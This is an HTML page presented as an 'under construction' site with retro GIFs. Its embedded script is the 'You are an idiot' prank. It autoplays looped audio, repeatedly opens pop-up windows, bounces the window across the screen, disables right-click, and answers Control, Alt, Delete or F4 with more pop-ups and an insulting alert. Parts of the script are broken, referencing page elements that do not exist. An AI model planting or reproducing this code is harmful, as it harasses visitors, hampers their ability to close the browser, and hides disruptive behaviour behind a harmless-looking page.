<!DOCTYPE html>
<html lang="en">
<head>
    <link rel="stylesheet" href="styles.css">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>UNDER CONSTRUCTION!!</title>
    <link rel="icon" type="image/x-icon" href="gifs/text-logos/icon.gif">
</head>
<body background="gifs/backgrounds/twinklebackground.gif">
    <table class="centered-container">
        <tbody>
            <tr><!--row 1-->
                <th colspan="2">
                    <div>
                        <img src="gifs/text-logos/logorainbow.gif" alt="">
                    </div>
                </th>
                <th colspan="2">
                    <img src="gifs/text-logos/AtAthensRhodes1319bookconstruction.gif" alt="">
                    <br>
                    <img src="gifs/text-logos/elainemarieslittlelanternGODSWORKIN-PROGRESS-Construction.gif" alt="">
                </th>
                <th>
                    <div class="flex-container">
                        <img src="gifs/funny gifs/2493441_9a5e2.gif" alt="" style="height: 100px;width: auto;">
                    </div>
                    <audio id="youare-audio" autoplay loop>
                        <source src="youare.mp3" type="audio/mp3">
                    </audio>
                </th>
                    </div>
                </td>
            </tr>
        </tbody>
    </table>
    <script>
        window.onload = proCreate(10);
        window.onload = playBall;
        window.oncontextmenu = () => false;
        window.onkeydown = async () => {
            if (['Control', 'Alt', 'Delete', 'F4'].includes(event.key)) {
                await proCreate(6);
                alert("You are an idiot!");
            }
            
            return null;
        }
        /* [Aug 2023] End of amendments. */
        let container = document.querySelector('#youare-container');

        let audio = document.querySelector('#youare-audio');
        let ovlap = document.querySelector('#youare-overlap');
        let micon = document.querySelector('#youare-micon');
        let overlap = false;

        function audioPlay() {
            if (!overlap) {
                audio.currentTime = 0;
                audio.play();
            }
            else {
                ovlap.currentTime = 0;
                ovlap.play();
            }
            
            container.removeEventListener('click', audioPlay);
            
            audio.addEventListener('timeupdate', audioOverlap);
            ovlap.addEventListener('timeupdate', audioOverlap);
            
        }

        function audioSwitch() {	
            if (
                audio.duration > 0 && audio.paused &&
                ovlap.duration > 0 && ovlap.paused
            ) {
                audioPlay();
            }
            else {
                audioStop();
            }
        }
        function audioOverlap() {
            if (!overlap && audio.currentTime > audio.duration - .45) {
                ovlap.currentTime = 0;
                ovlap.play();
                
                overlap = true;
            }
            
            if (overlap && ovlap.currentTime > ovlap.duration - .5) {
                audio.currentTime = 0;
                audio.play();
                
                overlap = false;
            }
        }

        container.addEventListener('click', audioPlay);
        container.addEventListener('click', () => {
            container.classList.remove('clicky');
        });

        micon.addEventListener('click', audioSwitch);

        let xOff = 5;
        let yOff = 5;
        let xPos = 400;
        let yPos = -100;

        function randomRange(min, max) {
            min = Math.ceil(min);
            max = Math.floor(max);
        
            return Math.floor(Math.random() * (max - min + 1) + min);
        }

        function changeTitle(title) {
            document.title = title;
        }

        function openWindow(url) {
            window.open(url, "_blank", 'menubar=no, status=no, toolbar=no, resizable=no, width=357, height=330, titlebar=no, alwaysRaised=yes');
        }

        async function proCreate(count) {	
            for (let i = 0; i < count; i++) {
                openWindow('lol.html');
                await new Promise(r => setTimeout(r, 50));
            }
        }

        function newXlt() {
            xOff = Math.ceil(-6 * Math.random()) * 5 - 10;
            window.focus();
        }

        function newXrt() {
            xOff = Math.ceil(7 * Math.random())  * 5 - 10;
            window.focus();
        }

        function newYup() {
            yOff = Math.ceil(-6 * Math.random()) * 5 - 10;
            window.focus();
        }

        function newYdn() {
            yOff = Math.ceil( 7 * Math.random()) * 5 - 10;
            window.focus();
        }

        function playBall() {
            xPos += xOff;
            yPos += yOff;
            
            if (xPos > screen.width - 357) newXlt();    
            if (xPos < 0) newXrt();
            
            if (yPos > screen.height - 330) newYup(); 		
            if (yPos < 0) newYdn();

            window.moveTo(xPos, yPos);
            setTimeout(playBall, 1);
        }        
       
    </script>
</body>
</html>